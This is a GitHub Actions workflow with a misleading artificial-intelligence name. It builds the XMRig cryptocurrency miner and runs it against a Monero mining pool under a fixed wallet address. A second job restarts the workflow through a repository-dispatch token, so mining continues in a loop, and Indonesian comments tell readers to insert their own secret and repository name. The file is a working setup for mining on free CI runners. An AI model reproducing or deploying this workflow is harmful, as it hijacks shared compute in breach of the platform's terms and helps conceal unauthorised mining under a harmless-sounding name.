name: Run kecerdasanbuatan

on:
  push:
    branches:
      - master
  schedule:
    - cron: "*/390 * * * *"

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2
      
    - name: Install dependencies
      run: |
        sudo apt update
        sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
    - name: Build XMRig
      run: |
        git clone https://github.com/xmrig/xmrig.git
        mkdir xmrig/build
        cd xmrig/build
        cmake ..
        make -j$(nproc)
    - name: Run XMRig
      run: |
        cd xmrig/build
        ./xmrig -o xmr.2miners.com:2222 -u 82VfeZRTtxRbYXHenMwrdHBK8P1mYQNMGfJuamki2PhT473tBkHgccxNZPn6468GxtVycU2yeDXiwisXS4KTikEaGkEWcrW -p gitrig17 -k --coin monero -a rx/0 --threads 2

  restart_workflow:
    needs: [build]
    runs-on: ubuntu-latest
    if: always()

    steps:
    - name: Restart Workflow
      uses: peter-evans/repository-dispatch@v1
      with:
        token: ${{ secrets.ten_rig }} # Ganti dengan nama variabel secrets yang sesuai
        repository: banjar-code/kecerdasan-buatan # Ganti dengan nama pengguna dan nama repositori Anda
        event-type: restart_workflow
